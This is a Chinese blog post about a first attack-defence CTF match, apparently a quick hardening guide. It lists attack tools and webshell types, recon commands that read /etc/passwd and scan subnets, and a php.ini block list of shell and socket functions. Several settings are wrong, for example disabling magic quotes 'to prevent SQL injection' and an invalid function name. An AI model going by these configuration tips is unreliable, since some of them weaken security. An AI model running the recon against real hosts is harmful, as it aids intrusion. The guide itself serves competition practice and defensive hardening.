<!DOCTYPE html><html lang="zh-CN"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=2"><meta name="theme-color" content="#222"><meta http-equiv="X-UA-COMPATIBLE" content="IE=edge,chrome=1"><meta name="renderer" content="webkit"><link rel="icon" type="image/ico" sizes="32x32" href="/assets/favicon.ico"><link rel="apple-touch-icon" sizes="180x180" href="/assets/apple-touch-icon.png"><link rel="alternate" href="/rss.xml" title="Glad to see U (◦˙▽˙◦)" type="application/rss+xml"><link rel="alternate" href="/atom.xml" title="Glad to see U (◦˙▽˙◦)" type="application/atom+xml"><link rel="alternate" type="application/json" title="Glad to see U (◦˙▽˙◦)" href="https://morio24.github.io/feed.json"><link rel="preconnect" href="https://lf9-cdn-tos.bytecdntp.com"><link rel="preconnect" href="https://at.alicdn.com"><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Mulish:400,400italic,700,700italic%7CFredericka%20the%20Great:400,400italic,700,700italic%7CNoto%20Serif%20JP:400,400italic,700,700italic%7CNoto%20Serif%20SC:400,400italic,700,700italic%7CInconsolata:400,400italic,700,700italic&amp;display=swap&amp;subset=latin,latin-ext" media="none" onload="this.media='all'"><link rel="stylesheet" href="/css/app.css?v=0.4.2"><link rel="modulepreload" href="/js/chunk-DS3BG4JW.js"><link rel="modulepreload" href="/js/chunk-RVW67TBB.js"><link rel="modulepreload" href="/js/chunk-X47RVIIR.js"><link rel="modulepreload" href="/js/chunk-XY2OSQWI.js"><link rel="modulepreload" href="/js/index.esm-BDFH7SBN.js"><link rel="modulepreload" href="/js/post-GS7DPJDE.js"><link rel="modulepreload" href="/js/quicklink-OBSKTOAG.js"><link rel="modulepreload" href="/js/search-WRIAD67U.js"><link rel="modulepreload" href="/js/siteInit.js"><link rel="preload" href="/images/fixedCover/0001.jpg" as="image" fetchpriority="high"><meta name="keywords" content="AWD,"><meta name="description" content="With Great Power Comes Great Responsibilities"><link rel="canonical" href="https://morio24.github.io/post/2024/2024/AWD%E5%88%9D%E4%BD%93%E9%AA%8C/"><title>AWD初体验</title><meta name="generator" content="Hexo 7.0.0"></head><body itemscope="" itemtype="http://schema.org/WebPage"><div id="loading"><div class="cat"><div class="body"></div><div class="head"><div class="face"></div></div><div class="foot"><div class="tummy-end"></div><div class="bottom"></div><div class="legs left"></div><div class="legs right"></div></div><div class="paw"><div class="hands left"></div><div class="hands right"></div></div></div></div><div id="container"><header id="header" itemscope="" itemtype="http://schema.org/WPHeader"><div class="inner"><div id="brand"><div class="pjax"><h1 itemprop="name headline">AWD初体验</h1><div class="meta"><span class="item" title="创建时间：2024-04-14 12:40:23"><span class="icon"><i class="ic i-calendar"></i></span><span class="text">发表于</span><time itemprop="dateCreated datePublished" datetime="2024-04-14T12:40:23+08:00">2024-04-14</time></span><span class="item" title="本文字数"><span class="icon"><i class="ic i-pen"></i></span><span class="text">本文字数</span><span>10k</span><span class="text">字</span></span><span class="item" title="阅读时长"><span class="icon"><i class="ic i-clock"></i></span><span class="text">阅读时长</span><span>9 分钟</span></span></div></div></div><nav id="nav"><div class="inner"><div class="toggle"><div class="lines" aria-label="切换导航栏"><span class="line"></span><span class="line"></span><span class="line"></span></div></div><ul class="menu"><li class="item title"><a href="/" rel="start">MorIo24's blog</a></li></ul><ul class="right" id="rightNav"><li class="item theme"><i class="ic i-sun"></i></li><li class="item search"><i class="ic i-search"></i></li></ul></div></nav></div><div class="pjax" id="imgs"><img id="random-cover" src="/images/fixedCover/0001.webp" loading="eager" decoding="async" fetchpriority="high" alt="Glad to see U (◦˙▽˙◦)"><script>(function() {
    var images = ["/images/fixedCover/0001.jpg","/images/fixedCover/0002.jpg","/images/fixedCover/0003.jpg","/images/fixedCover/0004.jpg","/images/fixedCover/0005.jpg","/images/fixedCover/0006.jpg","/images/fixedCover/0007.jpg","/images/fixedCover/0008.jpg","/images/fixedCover/0009.jpg","/images/fixedCover/0010.jpg","/images/fixedCover/0011.jpg","/images/fixedCover/0012.jpg","/images/fixedCover/0013.jpg","/images/fixedCover/0014.jpg","/images/fixedCover/0015.jpg","/images/fixedCover/0016.jpg","/images/fixedCover/0017.jpg","/images/fixedCover/0018.jpg","/images/fixedCover/0019.png","/images/fixedCover/0020.png","/images/fixedCover/0021.png","/images/fixedCover/0022.png","/images/fixedCover/0023.png","/images/fixedCover/0024.png","/images/fixedCover/0025.png","/images/fixedCover/0026.png","/images/fixedCover/0027.png","/images/fixedCover/0028.png","/images/fixedCover/0029.png","/images/fixedCover/0030.png","/images/fixedCover/0031.png","/images/fixedCover/0032.png","/images/fixedCover/0033.png","/images/fixedCover/0034.png","/images/fixedCover/0035.png","/images/fixedCover/0036.png","/images/fixedCover/0037.png","/images/fixedCover/0038.png","/images/fixedCover/0039.png","/images/fixedCover/0040.png","/images/fixedCover/0041.png","/images/fixedCover/0042.png","/images/fixedCover/0043.png","/images/fixedCover/0044.png","/images/fixedCover/0045.png","/images/fixedCover/0046.png","/images/fixedCover/0047.png","/images/fixedCover/0048.png","/images/fixedCover/0049.png","/images/fixedCover/0050.png","/images/fixedCover/0051.png","/images/fixedCover/0052.png","/images/fixedCover/0053.png","/images/fixedCover/0054.png","/images/fixedCover/0055.png","/images/fixedCover/0056.png","/images/fixedCover/0057.png","/images/fixedCover/0058.png","/images/fixedCover/0059.png","/images/fixedCover/0060.png","/images/fixedCover/0061.png","/images/fixedCover/0062.png"];
    var img = document.getElementById('random-cover');
    if (img && images && images.length > 1) {
        var randomIndex = Math.floor(Math.random() * images.length);
        img.src = images[randomIndex];
    }
})();</script></div><div id="waves"><svg class="waves" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 24 150 28" preserveAspectRatio="none" shape-rendering="auto"><defs><path id="gentle-wave" d="M-160 44c30 0 58-18 88-18s 58 18 88 18 58-18 88-18 58 18 88 18 v44h-352z"></path></defs><g class="parallax"><use xlink:href="#gentle-wave" x="48" y="0"></use><use xlink:href="#gentle-wave" x="48" y="3"></use><use xlink:href="#gentle-wave" x="48" y="5"></use><use xlink:href="#gentle-wave" x="48" y="7"></use></g></svg></div><div id="scroll-down"><span class="scroll-arrow"><i class="ic i-angle-down"></i></span></div></header><main><div class="inner"><div class="pjax" id="main"><div class="article wrap"><div class="breadcrumb" itemlistelement="" itemscope="" itemtype="https://schema.org/BreadcrumbList"><i class="ic i-home"></i><span><a href="/">首页</a></span><i class="ic i-angle-right"></i><span class="current" itemprop="itemListElement" itemscope="itemscope" itemtype="https://schema.org/ListItem"><a href="/categories/AWD/" itemprop="item" rel="index" title="分类于AWD"><span itemprop="name">AWD<meta itemprop="position" content="0"></span></a></span></div><article class="post block" itemscope="itemscope" itemtype="http://schema.org/Article" lang="zh-CN"><link itemprop="mainEntityOfPage" href="https://morio24.github.io/post/2024/2024/AWD%E5%88%9D%E4%BD%93%E9%AA%8C/"><span hidden="hidden" itemprop="author" itemscope="itemscope" itemtype="http://schema.org/Person"><meta itemprop="image" content="/assets/avatar.jpg"><meta itemprop="name" content="MorIo24"><meta itemprop="description" content=", With Great Power Comes Great Responsibilities"></span><span hidden="hidden" itemprop="publisher" itemscope="itemscope" itemtype="http://schema.org/Organization"><meta itemprop="name" content="Glad to see U (◦˙▽˙◦)"></span><div class="body md" itemprop="articleBody"><p><span class="label success">上次更新时间：2024-04-14</span><br>
Punhacker 即兴安排了一次 awd 攻防对抗赛，下午 4 点发通知晚上 8 点开始打两小时。<br>
加固时间仅 10 分钟，而没有接触过 awd 不知道忙活什么地方，一边看着文章一边下载工具，仅 40 分钟被攻破 4 次……</p>
<h1 id="awd攻略"><a class="anchor" href="#awd攻略">#</a> AWD 攻略</h1>
<h1 id="比赛流程"><a class="anchor" href="#比赛流程">#</a> 比赛流程</h1>
<ul class="lvl-0">
<li class="lvl-2">
<p>赛前准备环节：我们会分配到多个靶机服务器，通常是分配给我们 SSH 或者 VNC 的用户名和密码，还有相关 IP 等信息</p>
</li>
<li class="lvl-2">
<p>安全加固环节：我们需要先自己去登录靶机服务器，进行 30 分钟的安全加固（源码备份 / 弱口令修改 / 代码审计和修复 / 漏洞修复等）</p>
</li>
<li class="lvl-2">
<p>自由攻击环节：安全加固时间过后，开始自由攻击环节，通过对别的队伍的靶机服务器进行攻击（弱口令 / Web 漏洞 / 系统漏洞等）获得 Flag 进行加分，对应队伍失分</p>
</li>
</ul>
<h1 id="赛前准备"><a class="anchor" href="#赛前准备">#</a> 赛前准备</h1>
<ul class="lvl-0">
<li class="lvl-2">
<p>基础工具：<a target="_blank" rel="noopener external nofollow noreferrer" href="https://portswigger.net/burp">Burpsuite</a>、<a target="_blank" rel="noopener external nofollow noreferrer" href="https://github.com/sqlmapproject/sqlmap">sqlmap</a>、<a target="_blank" rel="noopener external nofollow noreferrer" href="https://www.kali.org/">kali</a>(nmap、masscan、nc、searchsploit、Metasploit、Hydra)、<a target="_blank" rel="noopener external nofollow noreferrer" href="https://www.xshell.com/zh/xshell/">Xshell</a>、<a target="_blank" rel="noopener external nofollow noreferrer" href="https://www.xshell.com/zh/xftp/">Xftp</a>、<a target="_blank" rel="noopener external nofollow noreferrer" href="https://github.com/raddyfiy/caidao-official-version">菜刀</a>或<a target="_blank" rel="noopener external nofollow noreferrer" href="https://github.com/AntSwordProject/antSword">蚁剑</a>、<a target="_blank" rel="noopener external nofollow noreferrer" href="https://github.com/maurosoria/dirsearch">dirsearch</a>、Chrome、Firefox 各类插件（<a target="_blank" rel="noopener external nofollow noreferrer" href="https://addons.mozilla.org/zh-CN/firefox/addon/hackbartool/?utm_source=addons.mozilla.org&amp;utm_medium=referral&amp;utm_content=search">hackbar</a>）、基础 waf（第三方 waf）、<a target="_blank" rel="noopener external nofollow noreferrer" href="https://github.com/zer0h/httpscan">httpscan</a></p>
</li>
<li class="lvl-2">
<p>图形化工具：Xterminal、Nessus（扫描工具）、TscanPlus、D 盾、代码审计工具（seay、Rips）</p>
</li>
<li class="lvl-2">
<p>一句话木马：php、asp、aspx、jsp、内存马</p>
</li>
<li class="lvl-2">
<p>代码审计工具：<a target="_blank" rel="noopener external nofollow noreferrer" href="https://github.com/f1tz/cnseay">seay</a>、Rips</p>
</li>
<li class="lvl-2">
<p><a target="_blank" rel="noopener external nofollow noreferrer" href="http://t.csdnimg.cn/JmIxf">不死马；反不死马</a></p>
</li>
<li class="lvl-2">
<p>提前准备好各种 cms 的 poc exp （因为可能不允许联网）phpwin phpcms dz <a target="_blank" rel="noopener external nofollow noreferrer" href="https://github.com/Mr-xn/Penetration_Testing_POC">戳这里</a></p>
</li>
</ul>
<h1 id="登录靶机"><a class="anchor" href="#登录靶机">#</a> 登录靶机</h1>
<h2 id="ssh登录注意端口"><a class="anchor" href="#ssh登录注意端口">#</a> ssh 登录（注意端口）</h2>
<blockquote>
<p>windows：finalshell、Xshell<br>
Linux： <code>ssh -p [port] [username]@[host]</code></p>
</blockquote>
<div class="note warning">
<p>注意：比赛通常都不会给 root 用户而是给一般用户，此时重点防御 <code>/var/html/</code>  下的服务，不用花过多时间去提权</p>
</div>
<h1 id="收集信息"><a class="anchor" href="#收集信息">#</a> 收集信息</h1>
<h2 id="明确linux机器信息"><a class="anchor" href="#明确linux机器信息">#</a> 明确 Linux 机器信息</h2>
<figure class="highlight bash"><figcaption data-lang="bash"></figcaption><table><tbody><tr><td data-num="1"></td><td><pre><span class="token function">uname</span> <span class="token parameter variable">-a</span>                       //系统信息</pre></td></tr><tr><td data-num="2"></td><td><pre><span class="token function">ps</span> <span class="token parameter variable">-aux</span>                        //查询进程信息</pre></td></tr><tr><td data-num="3"></td><td><pre><span class="token function">ps</span> <span class="token parameter variable">-ef</span> <span class="token operator">|</span> <span class="token function">grep</span> 进程名称         //筛选指定进程</pre></td></tr><tr><td data-num="4"></td><td><pre><span class="token function">id</span>                             //用于显示用户ID，以及所属群组ID</pre></td></tr><tr><td data-num="5"></td><td><pre><span class="token function">cat</span> /etc/passwd                //查看用户情况</pre></td></tr><tr><td data-num="6"></td><td><pre><span class="token function">ls</span> /home/                      //查看用户情况</pre></td></tr><tr><td data-num="7"></td><td><pre><span class="token function">find</span> / <span class="token parameter variable">-type</span> d <span class="token parameter variable">-perm</span> <span class="token parameter variable">-002</span>      //可写目录检查</pre></td></tr><tr><td data-num="8"></td><td><pre><span class="token function">ifconfig</span>                       //Linux上查看网卡信息</pre></td></tr></tbody></table></figure><h2 id="查看服务"><a class="anchor" href="#查看服务">#</a> 查看服务</h2>
<figure class="highlight bash"><figcaption data-lang="bash"></figcaption><table><tbody><tr><td data-num="1"></td><td><pre><span class="token function">netstat</span> <span class="token parameter variable">-nptl</span> <span class="token comment"># 推荐使用，注意 Local Address 为 0.0.0.0 是公共访问，注意弱口令等</span></pre></td></tr><tr><td data-num="2"></td><td><pre>nmap <span class="token parameter variable">-sP</span> <span class="token number">172.20</span>.x.x/24 <span class="token comment"># 本机使用</span></pre></td></tr></tbody></table></figure><p>一般来说，各个靶机服务的端口是一样的，获取自己主机的端口活动情况，再获取其他主机的 ip 地址。然后就开始攻守的任务</p>
<h2 id="查看开放端口"><a class="anchor" href="#查看开放端口">#</a> 查看开放端口</h2>
<figure class="highlight bash"><figcaption data-lang="bash"></figcaption><table><tbody><tr><td data-num="1"></td><td><pre><span class="token function">netstat</span>                                                       //查看活动连接</pre></td></tr><tr><td data-num="2"></td><td><pre><span class="token function">netstat</span> -ano/-a                                               //查看端口情况</pre></td></tr><tr><td data-num="3"></td><td><pre><span class="token function">netstat</span> <span class="token parameter variable">-anp</span>                                                  //查看端口</pre></td></tr><tr><td data-num="4"></td><td><pre>firewall-cmd <span class="token parameter variable">--zone</span><span class="token operator">=</span> public --remove-port<span class="token operator">=</span><span class="token number">80</span>/tcp –permanent   //关闭端口</pre></td></tr><tr><td data-num="5"></td><td><pre>firewall-cmd –reload                                          //防火墙重启</pre></td></tr></tbody></table></figure><h1 id="防守defence"><a class="anchor" href="#防守defence">#</a> 防守（defence）</h1>
<h2 id="查找本地flag"><a class="anchor" href="#查找本地flag">#</a> 查找本地 flag</h2>
<figure class="highlight bash"><figcaption data-lang="bash"></figcaption><table><tbody><tr><td data-num="1"></td><td><pre><span class="token function">grep</span> <span class="token parameter variable">-r</span> <span class="token string">"flag"</span> /var/www/html/  //Linux：在Web目录下查找flag</pre></td></tr><tr><td data-num="2"></td><td><pre>findstr /s /i <span class="token string">"flag"</span> *.*       //Windows：当前目录以及所有子目录下的所有文件中查找<span class="token string">"flag"</span>这个字符串</pre></td></tr></tbody></table></figure><p><strong>每一处 flag 都有洞，查看版本查询对应的 cve 进行进一步的加固</strong></p>
<h2 id="修改密码"><a class="anchor" href="#修改密码">#</a> 修改密码</h2>
<p>若 ssh 登录时用的弱密码，则登录后马上改密码<br>
弱口令密码更改<br>
 Mysql 密码默认都是 root，phpstudy 默认密码 123456</p>
<figure class="highlight bash"><figcaption data-lang="bash"></figcaption><table><tbody><tr><td data-num="1"></td><td><pre><span class="token punctuation">[</span>root@8 ~<span class="token punctuation">]</span>$ <span class="token function">passwd</span></pre></td></tr><tr><td data-num="2"></td><td><pre>Changing password <span class="token keyword">for</span> user root.</pre></td></tr><tr><td data-num="3"></td><td><pre>New password: </pre></td></tr><tr><td data-num="4"></td><td><pre>Retype new password: </pre></td></tr><tr><td data-num="5"></td><td><pre>passwd: all authentication tokens updated successfully.</pre></td></tr></tbody></table></figure><p>修改当前用户的密码，提权 root 后也可以修改 root 密码，若失败<a target="_blank" rel="noopener external nofollow noreferrer" href="http://t.csdnimg.cn/FDcgD">戳这里</a><br>
同时 web 服务、web 后台管理员、数据库也都需要修改密码（不建议重复使用密码）</p>
<figure class="highlight sql"><figcaption data-lang="SQL"></figcaption><table><tbody><tr><td data-num="1"></td><td><pre><span class="token keyword">set</span> password <span class="token keyword">for</span> root<span class="token variable">@ip</span> <span class="token operator">=</span> password<span class="token punctuation">(</span><span class="token string">'admin'</span><span class="token punctuation">)</span><span class="token punctuation">;</span></pre></td></tr><tr><td data-num="2"></td><td><pre><span class="token comment">-- 或者</span></pre></td></tr><tr><td data-num="3"></td><td><pre><span class="token keyword">update</span> <span class="token keyword">user</span> <span class="token keyword">set</span> password <span class="token operator">=</span> PASSWORD<span class="token punctuation">(</span><span class="token string">'admin'</span><span class="token punctuation">)</span> <span class="token keyword">where</span> <span class="token keyword">user</span><span class="token operator">=</span><span class="token string">'root'</span><span class="token punctuation">;</span></pre></td></tr><tr><td data-num="4"></td><td><pre><span class="token comment">-- 重新加载授权表，使最新的权限更改生效</span></pre></td></tr><tr><td data-num="5"></td><td><pre>flush <span class="token keyword">privileges</span><span class="token punctuation">;</span></pre></td></tr><tr><td data-num="6"></td><td><pre><span class="token comment">-- 需要以具有足够权限的用户身份登录到 MySQL 数据库才能执行这些操作</span></pre></td></tr></tbody></table></figure><h2 id="备份"><a class="anchor" href="#备份">#</a> 备份</h2>
<h3 id="备份数据库"><a class="anchor" href="#备份数据库">#</a> 备份数据库</h3>
<p>找到数据库备份文件： <code>mysql --help|grep 'cnf'</code> ；<br>
也可能在 <code>/var/lib/mysql</code>  下，或者 database.php<br>
 找 <code>db_name</code> 、 <code>db_user</code>  和 <code>db_passwd</code></p>
<figure class="highlight bash"><figcaption data-lang="bash"></figcaption><table><tbody><tr><td data-num="1"></td><td><pre>mysqldump <span class="token parameter variable">-u</span> db_user <span class="token parameter variable">-p</span> db_passwd db_name <span class="token operator">&gt;</span> bak.sql</pre></td></tr><tr><td data-num="2"></td><td><pre><span class="token comment"># 备份指定数据库</span></pre></td></tr><tr><td data-num="3"></td><td><pre>mysqldump --all-databases <span class="token operator">&gt;</span> bak.sql </pre></td></tr><tr><td data-num="4"></td><td><pre><span class="token comment"># 备份所有数据库</span></pre></td></tr><tr><td data-num="5"></td><td><pre>mysqldump <span class="token parameter variable">-uroot</span> <span class="token parameter variable">-proot</span> --all-databases --skip-lock-tables <span class="token operator">&gt;</span> /tmp/db.sql</pre></td></tr><tr><td data-num="6"></td><td><pre><span class="token comment"># 无 lock tables 权限的解决方法</span></pre></td></tr><tr><td data-num="7"></td><td><pre>mysql <span class="token parameter variable">-u</span> db_user <span class="token parameter variable">-p</span> db_passwd db_name <span class="token operator">&lt;</span> bak.sql</pre></td></tr><tr><td data-num="8"></td><td><pre><span class="token comment"># 还原指定数据库</span></pre></td></tr></tbody></table></figure><p>还原数据库也可以：</p>
<figure class="highlight sql"><figcaption data-lang="SQL"></figcaption><table><tbody><tr><td data-num="1"></td><td><pre>mysql<span class="token operator">&gt;</span> <span class="token keyword">create</span> <span class="token keyword">database</span> test <span class="token punctuation">;</span><span class="token comment">-- 建立要还原的数据库</span></pre></td></tr><tr><td data-num="2"></td><td><pre>mysql<span class="token operator">&gt;</span> <span class="token keyword">use</span> test<span class="token punctuation">;</span><span class="token comment">-- 切换到刚创建的数据库</span></pre></td></tr><tr><td data-num="3"></td><td><pre>mysql<span class="token operator">&gt;</span> source test<span class="token punctuation">.</span><span class="token keyword">sql</span><span class="token punctuation">;</span><span class="token comment">-- 导入数据库</span></pre></td></tr></tbody></table></figure><h3 id="关闭-mysql-远程登录"><a class="anchor" href="#关闭-mysql-远程登录">#</a> 关闭 MySQL 远程登录：</h3>
<figure class="highlight bash"><figcaption data-lang="bash"></figcaption><table><tbody><tr><td data-num="1"></td><td><pre>$ mysql <span class="token parameter variable">-u</span> root <span class="token parameter variable">-p</span></pre></td></tr><tr><td data-num="2"></td><td><pre>mysql<span class="token operator">&gt;</span> use mysql<span class="token punctuation">;</span><span class="token comment"># 切换数据库</span></pre></td></tr><tr><td data-num="3"></td><td><pre>mysql<span class="token operator">&gt;</span> update user <span class="token builtin class-name">set</span> <span class="token function">host</span> <span class="token operator">=</span> <span class="token string">'localhost'</span> where <span class="token assign-left variable">user</span><span class="token operator">=</span><span class="token string">'root'</span> and <span class="token assign-left variable">host</span><span class="token operator">=</span><span class="token string">'%'</span><span class="token punctuation">;</span></pre></td></tr><tr><td data-num="4"></td><td><pre>mysql<span class="token operator">&gt;</span> flush privileges<span class="token punctuation">;</span><span class="token comment"># 重新加载授权表，使最新的权限更改生效</span></pre></td></tr></tbody></table></figure><p>检查隐藏用户：查看 home 目录下是否有其他用户，/etc/passwd 是否有 /bin/bash 的用户</p>
<blockquote>
<p>对于 MySQL 的攻防，<a target="_blank" rel="noopener external nofollow noreferrer" href="https://blog.zgsec.cn/archives/26.html">戳这里</a></p>
</blockquote>
<p>MySQL 默认配置文件路径：</p>
<blockquote>
<p>C:\Program Files\MySQL\MySQLServer 5.1\my.ini   ------Windows<br>
/etc/my.cnf ------Linux<br>
/etc/mysql/my.cnf ------Linux</p>
</blockquote>
<p>修改 secure_file_priv 参数（日志功能的对应目录）<br>
 <code>secure_file_priv=""</code></p>
<p>重载 MySQL 配置<br>
 <code>FLUSH PRIVILEGES</code> <br>
 重启 MySQL 服务</p>
<figure class="highlight bash"><figcaption data-lang="bash"></figcaption><table><tbody><tr><td data-num="1"></td><td><pre><span class="token function">sudo</span> <span class="token function">service</span> mysql restart</pre></td></tr><tr><td data-num="2"></td><td><pre><span class="token function">sudo</span> systemctl restart mysql</pre></td></tr></tbody></table></figure><h2 id="web加固"><a class="anchor" href="#web加固">#</a> web 加固</h2>
<h3 id="设置权限"><a class="anchor" href="#设置权限">#</a> 设置权限</h3>
<figure class="highlight bash"><figcaption data-lang="bash"></figcaption><table><tbody><tr><td data-num="1"></td><td><pre><span class="token function">chmod</span> 0555 /var/www/html/*</pre></td></tr><tr><td data-num="2"></td><td><pre><span class="token function">chmod</span> 0555 /var/www/html/*.php <span class="token comment"># php 文件需要执行权限</span></pre></td></tr><tr><td data-num="3"></td><td><pre><span class="token function">chmod</span> 0555 /var/www/html       <span class="token comment"># Web 根目录设置只读和执行权限</span></pre></td></tr><tr><td data-num="4"></td><td><pre><span class="token function">chmod</span> <span class="token parameter variable">-R</span> <span class="token number">644</span> /var/www          <span class="token comment"># -R 递归设置</span></pre></td></tr><tr><td data-num="5"></td><td><pre></pre></td></tr><tr><td data-num="6"></td><td><pre><span class="token comment"># 改变文件的属主和属组来设置严格的权限</span></pre></td></tr><tr><td data-num="7"></td><td><pre><span class="token function">chown</span> <span class="token parameter variable">-R</span> root:root /var/www/html/  <span class="token comment"># 设置拥有人为 root:root 或 httpd:httpd</span></pre></td></tr><tr><td data-num="8"></td><td><pre><span class="token function">chown</span> <span class="token parameter variable">-R</span> apache:apache /var/www/html/ <span class="token comment"># 确保 apache 拥有 /var/www/html/</span></pre></td></tr></tbody></table></figure><h3 id="网站备份"><a class="anchor" href="#网站备份">#</a> 网站备份</h3>
<figure class="highlight bash"><figcaption data-lang="bash"></figcaption><table><tbody><tr><td data-num="1"></td><td><pre><span class="token function">tar</span> <span class="token parameter variable">-cvf</span> web.tar /var/www/html</pre></td></tr><tr><td data-num="2"></td><td><pre><span class="token function">zip</span> <span class="token parameter variable">-q</span> <span class="token parameter variable">-r</span> web.zip /var/www/html</pre></td></tr><tr><td data-num="3"></td><td><pre><span class="token comment"># 压缩源码</span></pre></td></tr><tr><td data-num="4"></td><td><pre><span class="token function">tar</span> <span class="token parameter variable">-xvf</span> web.tar <span class="token parameter variable">-c</span> /var/www/html</pre></td></tr><tr><td data-num="5"></td><td><pre><span class="token function">unzip</span> web.zip <span class="token parameter variable">-d</span> /var/www/html</pre></td></tr><tr><td data-num="6"></td><td><pre><span class="token comment"># 解压缩源码</span></pre></td></tr><tr><td data-num="7"></td><td><pre><span class="token function">mv</span> web.zip /home/xxx</pre></td></tr><tr><td data-num="8"></td><td><pre><span class="token comment"># 一定要移动不然源码泄露  </span></pre></td></tr><tr><td data-num="9"></td><td><pre></pre></td></tr><tr><td data-num="10"></td><td><pre><span class="token function">scp</span> username@servername:/path/filename /tmp/local_destination  <span class="token comment"># 从服务器下载单个文件到本地</span></pre></td></tr><tr><td data-num="11"></td><td><pre><span class="token function">scp</span> /path/local_filename username@servername:/path             <span class="token comment"># 从本地上传单个文件到服务器</span></pre></td></tr><tr><td data-num="12"></td><td><pre><span class="token function">scp</span> <span class="token parameter variable">-r</span> username@servername:remote_dir/ /tmp/local_dir          <span class="token comment"># 从服务器下载整个目录到本地</span></pre></td></tr><tr><td data-num="13"></td><td><pre><span class="token function">scp</span> <span class="token parameter variable">-r</span> /tmp/local_dir username@servername:remote_dir           <span class="token comment"># 从本地上传整个目录到服务器</span></pre></td></tr></tbody></table></figure><h3 id="日志记录"><a class="anchor" href="#日志记录">#</a> 日志记录</h3>
<p><strong>python 文件监控脚本，<a href="">传送门</a></strong></p>
<blockquote>
<p>/var/log/nginx/    #默认 Nginx 日志目录<br>
 /var/log/apache/   #默认 Apache 日志目录<br>
 /var/log/apache2/  #默认 Apache 日志目录<br>
 /usr/local/tomcat/logs #Tomcat 日志目录<br>
 tail -f xxx.log   #实时刷新滚动日志文件</p>
</blockquote>
<h3 id="设置htaccess禁用php脚本执行"><a class="anchor" href="#设置htaccess禁用php脚本执行">#</a> 设置.htaccess 禁用 php 脚本执行</h3>
<details class="info"><summary>👇脚本点击展开</summary><div>
<figure class="highlight xml"><figcaption data-lang="XML"></figcaption><table><tbody><tr><td data-num="1"></td><td><pre>&lt;Directory "/var/www/html/upload"&gt;   //指定目录后续的指令将应用于该目录</pre></td></tr><tr><td data-num="2"></td><td><pre>Options -ExecCGI -Indexes            //禁用了目录中的 CGI 执行和目录索引（显示目录内容列表）功能。</pre></td></tr><tr><td data-num="3"></td><td><pre>AllowOverride None                   //不允许在该目录中使用 .htaccess 文件来覆盖服务器的配置。</pre></td></tr><tr><td data-num="4"></td><td><pre>RemoveHandler .php .phtml .php3 .pht .php4 .php5 .php7 .shtml  </pre></td></tr><tr><td data-num="5"></td><td><pre>RemoveType .php .phtml .php3 .pht .php4 .php5 .php7 .shtml      </pre></td></tr><tr><td data-num="6"></td><td><pre>//这两个指令移除指定文件扩展名的处理器和类型。</pre></td></tr><tr><td data-num="7"></td><td><pre>//在这种情况下，这些指令从 Apache 的处理列表中移除了与 PHP 相关的扩展名和服务器端包含（SSI）文件类型。</pre></td></tr><tr><td data-num="8"></td><td><pre>php_flag engine off     //这个指令将 PHP 的引擎标志（engine）设置为关闭状态，从而禁用了在该目录中执行 PHP 脚本的能力。</pre></td></tr><tr><td data-num="9"></td><td><pre><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>FilesMatch</span> <span class="token attr-name">".+\.ph(p[3457]?|t|tml)$"</span><span class="token punctuation">&gt;</span></span></pre></td></tr><tr><td data-num="10"></td><td><pre>deny from all</pre></td></tr><tr><td data-num="11"></td><td><pre><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>FilesMatch</span><span class="token punctuation">&gt;</span></span>  //这三行命令使用正则表达式匹配了以 .php、.phtml、.php3、.pht、.php4、.php5、.php7、.shtml 结尾的文件，并将其访问权限设置为拒绝所有</pre></td></tr><tr><td data-num="12"></td><td><pre><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>Directory</span><span class="token punctuation">&gt;</span></span></pre></td></tr></tbody></table></figure></div></details>
<h3 id="php参数安全配置"><a class="anchor" href="#php参数安全配置">#</a> php 参数安全配置</h3>
<p>在 <code>/etc/php7.2.1/php.ini</code>  下</p>
<ul class="lvl-0">
<li class="lvl-2">
<p><strong>禁用高危函数</strong></p>
</li>
</ul>
<figure class="highlight raw"><figcaption data-lang=""><span>disable_functions </span></figcaption><table><tbody><tr><td data-num="1"></td><td><pre>disable_functions = system,exec,shell_exec,passthru,proc_open,proc_close,proc_get_status,checkdnsrr,getmxrr,getservbyname,getservbyport, syslog,popen,show_source,highlight_file,dl,socket_listen,socket_create,socket_bind,socket_accept, socket_connect, stream_socket_server, stream_socket_accept,stream_socket_client,ftp_connect, ftp_login,ftp_pasv,ftp_get,sys_getloadavg,disk_total_space, disk_free_space,posix_ctermid,posix_get_last_error,posix_getcwd, posix_getegid,posix_geteuid,posix_getgid, posix_getgrgid,posix_getgrnam,posix_getgroups,posix_getlogin,posix_getpgid,posix_getpgrp,posix_getpid,posix_getppid,posix_Tupungato,posix_getpwuid, posix_getrlimit, posix_getsid,posix_getuid,posix_isatty, posix_kill,posix_mkfifo,posix_setegid,posix_seteuid,posix_setgid, posix_setpgid,posix_setsid,posix_setuid,posix_strerror,posix_times,posix_ttyname,posix_uname</pre></td></tr></tbody></table></figure><ul class="lvl-0">
<li class="lvl-2">
<p><strong>配置 open_basedir</strong> （将用户访问文件的活动范围限制在指定的区域）</p>
</li>
</ul>
<figure class="highlight raw"><figcaption data-lang=""><span>php.ini</span></figcaption><table><tbody><tr><td data-num="1"></td><td><pre>open_basedir=/var/www/html</pre></td></tr></tbody></table></figure><ul class="lvl-0">
<li class="lvl-2">
<p><strong>禁用魔术引号</strong>（自动对外部来源数据进行转义，防止 SQL 注入）</p>
</li>
</ul>
<figure class="highlight raw"><figcaption data-lang=""><span>php.ini</span></figcaption><table><tbody><tr><td data-num="1"></td><td><pre>magic_quotes_gpc = Off</pre></td></tr></tbody></table></figure><ul class="lvl-0">
<li class="lvl-2">
<p><strong>关闭 PHP 伪协议</strong></p>
</li>
</ul>
<figure class="highlight raw"><figcaption data-lang=""><span>php.ini</span></figcaption><table><tbody><tr><td data-num="1"></td><td><pre>allow_url_fopen = Off</pre></td></tr><tr><td data-num="2"></td><td><pre>allow_url_include = Off</pre></td></tr></tbody></table></figure><ul class="lvl-0">
<li class="lvl-2">
<p><strong>重启 PHP</strong></p>
</li>
</ul>
